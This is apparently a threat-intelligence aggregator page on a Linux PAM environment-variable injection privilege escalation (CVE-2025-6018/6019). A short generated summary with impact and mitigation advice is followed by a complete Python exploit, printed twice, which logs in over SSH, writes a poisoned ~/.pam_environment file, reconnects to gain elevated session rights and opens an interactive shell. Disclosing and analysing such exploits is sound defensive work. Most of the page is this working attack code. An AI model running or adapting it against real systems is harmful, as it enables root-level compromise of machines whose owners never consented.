Linux PAM Environment - Variable Injection Local Privilege Escalation

Severity: highType: exploit

AI Analysis

Technical Summary

The Linux PAM (Pluggable Authentication Modules) Environment Variable Injection Local Privilege Escalation exploit targets a vulnerability within the PAM environment handling on Linux systems. PAM is a critical authentication framework used by many Linux distributions to manage user authentication and session setup. This vulnerability arises when an attacker can inject or manipulate environment variables during the PAM session initialization process. By injecting crafted environment variables, an attacker with local access can escalate their privileges to root or another high-privilege user. The exploit leverages improper sanitization or validation of environment variables, allowing the attacker to execute arbitrary code or modify the execution environment of privileged processes. The presence of Python exploit code indicates that the attack can be automated and executed easily by an attacker with local access. Since PAM is widely used across Linux distributions, this vulnerability potentially affects a broad range of systems, especially those that do not have updated PAM modules or lack proper environment variable restrictions. The exploit does not require remote access but does require local user access, which could be gained through compromised user accounts or other local attack vectors. No patch links are currently provided, suggesting that mitigation may require manual configuration changes or waiting for vendor updates.

Potential Impact

For European organizations, this vulnerability poses a significant risk as it allows local attackers to escalate privileges to root, potentially leading to full system compromise. This can result in unauthorized access to sensitive data, disruption of critical services, and the ability to install persistent malware or backdoors. Organizations relying on Linux servers for critical infrastructure, web hosting, or internal services could see severe operational impacts. The threat is particularly concerning for environments with multiple users or shared access, such as universities, research institutions, and enterprises with Linux-based workstations or servers. If exploited, attackers could bypass existing security controls, evade detection by escalating privileges, and move laterally within networks. The lack of known exploits in the wild currently reduces immediate risk, but the availability of exploit code in Python lowers the barrier for attackers to develop or adapt exploits rapidly.

Mitigation Recommendations

European organizations should immediately audit their Linux systems to identify PAM versions and configurations. Until official patches are released, administrators should implement strict environment variable filtering in PAM configurations, such as using the 'pam_env' module with carefully curated environment variable lists. Limiting local user access and enforcing the principle of least privilege can reduce the attack surface. Employing mandatory access control systems like SELinux or AppArmor can help contain the impact of privilege escalation attempts. Regularly monitoring system logs for unusual PAM activity and environment variable manipulations can aid in early detection. Organizations should also ensure timely application of security updates from Linux distribution vendors once patches become available. Additionally, conducting user training to prevent local account compromise and using multi-factor authentication for local logins can further mitigate risk.

Affected Countries

Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Sweden

Indicators of Compromise

exploit-code: # Exploit Title: Linux PAM Environment - Variable Injection Local Privilege Escalation # Exploit Author: @İbrahimsql # Exploit Author's github: https://github.com/ibrahmsql # Description: PAM pam_env.so module allows environment variable injection via ~/.pam_environment # leading to privilege escalation through SystemD session manipulation # CVE: CVE-2025-6018, CVE-2025-6019 # Vendor Homepage: https://github.com/linux-pam/linux-pam # Software Link: https://github.com/linux-pam/linux-pam/releases # Version: PAM 1.3.0 - 1.6.0 (vulnerable versions) # Category: Local Privilege Escalation # Requirements: paramiko>=2.12.0 # Usage: python3 cve_2025_6018_professional.py -i target_ip -u username -p password # References: # - https://access.redhat.com/security/cve/CVE-2025-6018 # - https://bugzilla.redhat.com/show_bug.cgi?id=2372693 # - https://bugzilla.suse.com/show_bug.cgi?id=1243226 import paramiko import time import sys import socket import argparse import logging from datetime import datetime # Setup logging logging.basicConfig( level=logging.INFO, format='%(asctime)s [%(levelname)s] %(message)s', datefmt='%Y-%m-%d %H:%M:%S', handlers=[ logging.FileHandler('cve_2025_6018_exploit.log'), logging.StreamHandler(sys.stdout) ] ) logger = logging.getLogger(__name__) class CVEExploit: def __init__(self): self.vulnerable_versions = [ "pam-1.3.0", "pam-1.3.1", "pam-1.4.0", "pam-1.5.0", "pam-1.5.1", "pam-1.5.2", "pam-1.5.3", "pam-1.6.0" ] def check_vulnerability(self, client): """Enhanced vulnerability detection""" logger.info("Starting vulnerability assessment") checks = { "pam_version": "rpm -q pam || dpkg -l | grep libpam", "pam_env": "find /etc/pam.d/ -name '*' -exec grep -l 'pam_env' {} \\; 2>/dev/null", "pam_systemd": "find /etc/pam.d/ -name '*' -exec grep -l 'pam_systemd' {} \\; 2>/dev/null", "systemd_version": "systemctl --version | head -1" } vulnerable = False for check_name, command in checks.items(): logger.info(f"Executing check: {check_name}") try: stdin, stdout, stderr = client.exec_command(command, timeout=10) output = stdout.read().decode().strip() if check_name == "pam_version": for vuln_ver in self.vulnerable_versions: if vuln_ver in output: logger.info(f"Vulnerable PAM version detected: {vuln_ver}") vulnerable = True break elif check_name == "pam_env" and output: logger.info("pam_env.so configuration found") vulnerable = True elif check_name == "pam_systemd" and output: logger.info("pam_systemd.so found - escalation vector available") if output and check_name != "pam_version": logger.debug(f"Command output: {output[:100]}...") except Exception as e: logger.warning(f"Check {check_name} failed: {e}") time.sleep(0.5) return vulnerable def create_malicious_environment(self, client): """Create enhanced .pam_environment file""" logger.info("Creating malicious environment file") payload = '''# CVE-2025-6018 Environment Poisoning XDG_SEAT OVERRIDE=seat0 XDG_VTNR OVERRIDE=1 XDG_SESSION_TYPE OVERRIDE=x11 XDG_SESSION_CLASS OVERRIDE=user XDG_RUNTIME_DIR OVERRIDE=/tmp/runtime SYSTEMD_LOG_LEVEL OVERRIDE=debug''' try: logger.info("Writing .pam_environment file") cmd = f"cat > ~/.pam_environment << 'EOF'\n{payload}\nEOF" stdin, stdout, stderr = client.exec_command(cmd) # Verify creation stdin, stdout, stderr = client.exec_command("cat ~/.pam_environment") output = stdout.read().decode() if "OVERRIDE" in output: logger.info("Malicious environment file created successfully") return True else: logger.error("Failed to create environment file") return False except Exception as e: logger.error(f"Environment poisoning failed: {e}") return False def test_privilege_escalation(self, client): """Test privilege escalation vectors""" logger.info("Testing privilege escalation vectors") tests = [ ("SystemD Reboot", "gdbus call --system --dest org.freedesktop.login1 --object-path /org/freedesktop/login1 --method org.freedesktop.login1.Manager.CanReboot", "yes"), ("SystemD Shutdown", "gdbus call --system --dest org.freedesktop.login1 --object-path /org/freedesktop/login1 --method org.freedesktop.login1.Manager.CanPowerOff", "yes"), ("PolicyKit Check", "pkcheck --action-id org.freedesktop.policykit.exec --process $$ 2>/dev/null || echo 'denied'", "authorized") ] escalated = False for test_name, command, success_indicator in tests: logger.info(f"Testing: {test_name}") try: stdin, stdout, stderr = client.exec_command(command, timeout=10) output = stdout.read().decode().strip() if success_indicator in output.lower(): logger.info(f"PRIVILEGE ESCALATION DETECTED: {test_name}") escalated = True else: logger.info(f"No escalation detected: {test_name}") except Exception as e: logger.warning(f"Test {test_name} failed: {e}") return escalated def interactive_shell(self, client): """Professional interactive shell""" logger.info("Starting interactive shell session") shell = client.invoke_shell() shell.send("export PS1='exploit$ '\n") time.sleep(1) # Clear buffer while shell.recv_ready(): shell.recv(1024) print("\n--- Interactive Shell ---") print("Commands: 'exit' to quit, 'status' for privilege check") while True: try: command = input("exploit$ ") if command.lower() == 'exit': break elif command.lower() == 'status': stdin, stdout, stderr = client.exec_command("id && groups") print(stdout.read().decode()) continue shell.send(command + "\n") time.sleep(0.5) while shell.recv_ready(): output = shell.recv(1024).decode('utf-8', errors='ignore') print(output, end='') except KeyboardInterrupt: logger.warning("Use 'exit' to quit properly") except Exception as e: logger.error(f"Shell error: {e}") break def run_exploit(self, hostname, username, password=None, key_filename=None, port=22): """Main exploit execution""" logger.info(f"Starting CVE-2025-6018 exploit against {hostname}:{port}") try: # Initial connection client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) logger.info(f"Connecting to {hostname}:{port} as {username}") client.connect(hostname, port=port, username=username, password=password, key_filename=key_filename, timeout=10) logger.info("SSH connection established") # Check vulnerability if not self.check_vulnerability(client): logger.error("Target does not appear vulnerable to CVE-2025-6018/6019") return False logger.info("Target appears vulnerable, proceeding with exploitation") # Create malicious environment if not self.create_malicious_environment(client): logger.error("Failed to create malicious environment") return False logger.info("Reconnecting to trigger PAM environment loading") client.close() time.sleep(2) # Reconnect to trigger PAM client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) client.connect(hostname, port=port, username=username, password=password, key_filename=key_filename) logger.info("Reconnection successful") # Test privilege escalation if self.test_privilege_escalation(client): logger.info("EXPLOITATION SUCCESSFUL - Privilege escalation confirmed") self.interactive_shell(client) else: logger.warning("No clear privilege escalation detected") logger.info("Manual verification may be required") return True except paramiko.AuthenticationException: logger.error("Authentication failed - check credentials") except paramiko.SSHException as e: logger.error(f"SSH error: {e}") except socket.error as e: logger.error(f"Network error: {e}") except Exception as e: logger.error(f"Unexpected error: {e}") finally: try: client.close() except: pass logger.info("Connection closed") return False def main(): parser = argparse.ArgumentParser( description="CVE-2025-6018/6019 PAM Environment Injection Exploit", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" Examples: python3 %(prog)s -i 192.168.1.100 -u testuser -p password123 python3 %(prog)s -i target.com -u admin -k ~/.ssh/id_rsa """ ) parser.add_argument("-i", "--hostname", required=True, help="Target hostname or IP") parser.add_argument("-u", "--username", required=True, help="SSH username") parser.add_argument("-p", "--password", help="SSH password") parser.add_argument("-k", "--key", dest="key_filename", help="SSH private key file") parser.add_argument("--port", type=int, default=22, help="SSH port (default: 22)") parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose logging") args = parser.parse_args() if args.verbose: logging.getLogger().setLevel(logging.DEBUG) if not args.password and not args.key_filename: parser.error("Provide either password (-p) or private key (-k)") # Security warning logger.warning("Use only with proper authorization!") exploit = CVEExploit() success = exploit.run_exploit( hostname=args.hostname, username=args.username, password=args.password, key_filename=args.key_filename, port=args.port ) sys.exit(0 if success else 1) if __name__ == "__main__": main()

Linux PAM Environment - Variable Injection Local Privilege Escalation

Severity: high

Type: exploit

Linux PAM Environment - Variable Injection Local Privilege Escalation

Technical Summary

Potential Impact

Mitigation Recommendations

Affected Countries

Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Sweden

Indicators of Compromise

exploit-code: # Exploit Title: Linux PAM Environment - Variable Injection Local Privilege Escalation # Exploit Author: @İbrahimsql # Exploit Author's github: https://github.com/ibrahmsql # Description: PAM pam_env.so module allows environment variable injection via ~/.pam_environment # leading to privilege escalation through SystemD session manipulation # CVE: CVE-2025-6018, CVE-2025-6019 # Vendor Homepage: https://github.com/linux-pam/linux-pam # Software Link: https://github.com/linux-pam/linux-pam/releases # Version: PAM 1.3.0 - 1.6.0 (vulnerable versions) # Category: Local Privilege Escalation # Requirements: paramiko>=2.12.0 # Usage: python3 cve_2025_6018_professional.py -i target_ip -u username -p password # References: # - https://access.redhat.com/security/cve/CVE-2025-6018 # - https://bugzilla.redhat.com/show_bug.cgi?id=2372693 # - https://bugzilla.suse.com/show_bug.cgi?id=1243226 import paramiko import time import sys import socket import argparse import logging from datetime import datetime # Setup logging logging.basicConfig( level=logging.INFO, format='%(asctime)s [%(levelname)s] %(message)s', datefmt='%Y-%m-%d %H:%M:%S', handlers=[ logging.FileHandler('cve_2025_6018_exploit.log'), logging.StreamHandler(sys.stdout) ] ) logger = logging.getLogger(__name__) class CVEExploit: def __init__(self): self.vulnerable_versions = [ "pam-1.3.0", "pam-1.3.1", "pam-1.4.0", "pam-1.5.0", "pam-1.5.1", "pam-1.5.2", "pam-1.5.3", "pam-1.6.0" ] def check_vulnerability(self, client): """Enhanced vulnerability detection""" logger.info("Starting vulnerability assessment") checks = { "pam_version": "rpm -q pam || dpkg -l | grep libpam", "pam_env": "find /etc/pam.d/ -name '*' -exec grep -l 'pam_env' {} \\; 2>/dev/null", "pam_systemd": "find /etc/pam.d/ -name '*' -exec grep -l 'pam_systemd' {} \\; 2>/dev/null", "systemd_version": "systemctl --version | head -1" } vulnerable = False for check_name, command in checks.items(): logger.info(f"Executing check: {check_name}") try: stdin, stdout, stderr = client.exec_command(command, timeout=10) output = stdout.read().decode().strip() if check_name == "pam_version": for vuln_ver in self.vulnerable_versions: if vuln_ver in output: logger.info(f"Vulnerable PAM version detected: {vuln_ver}") vulnerable = True break elif check_name == "pam_env" and output: logger.info("pam_env.so configuration found") vulnerable = True elif check_name == "pam_systemd" and output: logger.info("pam_systemd.so found - escalation vector available") if output and check_name != "pam_version": logger.debug(f"Command output: {output[:100]}...") except Exception as e: logger.warning(f"Check {check_name} failed: {e}") time.sleep(0.5) return vulnerable def create_malicious_environment(self, client): """Create enhanced .pam_environment file""" logger.info("Creating malicious environment file") payload = '''# CVE-2025-6018 Environment Poisoning XDG_SEAT OVERRIDE=seat0 XDG_VTNR OVERRIDE=1 XDG_SESSION_TYPE OVERRIDE=x11 XDG_SESSION_CLASS OVERRIDE=user XDG_RUNTIME_DIR OVERRIDE=/tmp/runtime SYSTEMD_LOG_LEVEL OVERRIDE=debug''' try: logger.info("Writing .pam_environment file") cmd = f"cat > ~/.pam_environment << 'EOF'\n{payload}\nEOF" stdin, stdout, stderr = client.exec_command(cmd) # Verify creation stdin, stdout, stderr = client.exec_command("cat ~/.pam_environment") output = stdout.read().decode() if "OVERRIDE" in output: logger.info("Malicious environment file created successfully") return True else: logger.error("Failed to create environment file") return False except Exception as e: logger.error(f"Environment poisoning failed: {e}") return False def test_privilege_escalation(self, client): """Test privilege escalation vectors""" logger.info("Testing privilege escalation vectors") tests = [ ("SystemD Reboot", "gdbus call --system --dest org.freedesktop.login1 --object-path /org/freedesktop/login1 --method org.freedesktop.login1.Manager.CanReboot", "yes"), ("SystemD Shutdown", "gdbus call --system --dest org.freedesktop.login1 --object-path /org/freedesktop/login1 --method org.freedesktop.login1.Manager.CanPowerOff", "yes"), ("PolicyKit Check", "pkcheck --action-id org.freedesktop.policykit.exec --process $$ 2>/dev/null || echo 'denied'", "authorized") ] escalated = False for test_name, command, success_indicator in tests: logger.info(f"Testing: {test_name}") try: stdin, stdout, stderr = client.exec_command(command, timeout=10) output = stdout.read().decode().strip() if success_indicator in output.lower(): logger.info(f"PRIVILEGE ESCALATION DETECTED: {test_name}") escalated = True else: logger.info(f"No escalation detected: {test_name}") except Exception as e: logger.warning(f"Test {test_name} failed: {e}") return escalated def interactive_shell(self, client): """Professional interactive shell""" logger.info("Starting interactive shell session") shell = client.invoke_shell() shell.send("export PS1='exploit$ '\n") time.sleep(1) # Clear buffer while shell.recv_ready(): shell.recv(1024) print("\n--- Interactive Shell ---") print("Commands: 'exit' to quit, 'status' for privilege check") while True: try: command = input("exploit$ ") if command.lower() == 'exit': break elif command.lower() == 'status': stdin, stdout, stderr = client.exec_command("id && groups") print(stdout.read().decode()) continue shell.send(command + "\n") time.sleep(0.5) while shell.recv_ready(): output = shell.recv(1024).decode('utf-8', errors='ignore') print(output, end='') except KeyboardInterrupt: logger.warning("Use 'exit' to quit properly") except Exception as e: logger.error(f"Shell error: {e}") break def run_exploit(self, hostname, username, password=None, key_filename=None, port=22): """Main exploit execution""" logger.info(f"Starting CVE-2025-6018 exploit against {hostname}:{port}") try: # Initial connection client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) logger.info(f"Connecting to {hostname}:{port} as {username}") client.connect(hostname, port=port, username=username, password=password, key_filename=key_filename, timeout=10) logger.info("SSH connection established") # Check vulnerability if not self.check_vulnerability(client): logger.error("Target does not appear vulnerable to CVE-2025-6018/6019") return False logger.info("Target appears vulnerable, proceeding with exploitation") # Create malicious environment if not self.create_malicious_environment(client): logger.error("Failed to create malicious environment") return False logger.info("Reconnecting to trigger PAM environment loading") client.close() time.sleep(2) # Reconnect to trigger PAM client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) client.connect(hostname, port=port, username=username, password=password, key_filename=key_filename) logger.info("Reconnection successful") # Test privilege escalation if self.test_privilege_escalation(client): logger.info("EXPLOITATION SUCCESSFUL - Privilege escalation confirmed") self.interactive_shell(client) else: logger.warning("No clear privilege escalation detected") logger.info("Manual verification may be required") return True except paramiko.AuthenticationException: logger.error("Authentication failed - check credentials") except paramiko.SSHException as e: logger.error(f"SSH error: {e}") except socket.error as e: logger.error(f"Network error: {e}") except Exception as e: logger.error(f"Unexpected error: {e}") finally: try: client.close() except: pass logger.info("Connection closed") return False def main(): parser = argparse.ArgumentParser( description="CVE-2025-6018/6019 PAM Environment Injection Exploit", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" Examples: python3 %(prog)s -i 192.168.1.100 -u testuser -p password123 python3 %(prog)s -i target.com -u admin -k ~/.ssh/id_rsa """ ) parser.add_argument("-i", "--hostname", required=True, help="Target hostname or IP") parser.add_argument("-u", "--username", required=True, help="SSH username") parser.add_argument("-p", "--password", help="SSH password") parser.add_argument("-k", "--key", dest="key_filename", help="SSH private key file") parser.add_argument("--port", type=int, default=22, help="SSH port (default: 22)") parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose logging") args = parser.parse_args() if args.verbose: logging.getLogger().setLevel(logging.DEBUG) if not args.password and not args.key_filename: parser.error("Provide either password (-p) or private key (-k)") # Security warning logger.warning("Use only with proper authorization!") exploit = CVEExploit() success = exploit.run_exploit( hostname=args.hostname, username=args.username, password=args.password, key_filename=args.key_filename, port=args.port ) sys.exit(0 if success else 1) if __name__ == "__main__": main()

Source: Exploit-DB RSS Feed

Published: Mon Jul 28 2025

Linux PAM Environment - Variable Injection Local Privilege Escalation

High

Exploitlinux local exploit linux

Published: Mon Jul 28 2025 (07/28/2025, 00:00:00 UTC)

Source: Exploit-DB RSS Feed

Description

Linux PAM Environment - Variable Injection Local Privilege Escalation

AI-Powered Analysis

AILast updated: 08/18/2025, 01:17:47 UTC

Technical Analysis

Potential Impact

Mitigation Recommendations

Affected Countries

Need more detailed analysis?Get Pro

Pro Feature

For access to advanced analysis and higher rate limits, contact root@offseq.com

Technical Details

Edb Id: 52386
Has Exploit Code: true
Code Language: python

Indicators of Compromise

Exploit Source Code

Exploit Code

Exploit code for Linux PAM Environment - Variable Injection Local Privilege Escalation

# Exploit Title: Linux PAM Environment - Variable Injection Local Privilege Escalation
# Exploit Author: @İbrahimsql
# Exploit Author's github: https://github.com/ibrahmsql
# Description: PAM pam_env.so module allows environment variable injection via ~/.pam_environment
#              leading to privilege escalation through SystemD session manipulation
# CVE: CVE-2025-6018, CVE-2025-6019
# Vendor Homepage: https://github.com/linux-pam/linux-pam
# Software Link: https://github.com/linux-pam/linux... (10966 more characters)

Code Length: 11,466 characters

Threat ID: 688824f4ad5a09ad0089712a

Added to database: 7/29/2025, 1:33:40 AM

Last enriched: 8/18/2025, 1:17:47 AM

Last updated: 8/23/2025, 1:16:56 AM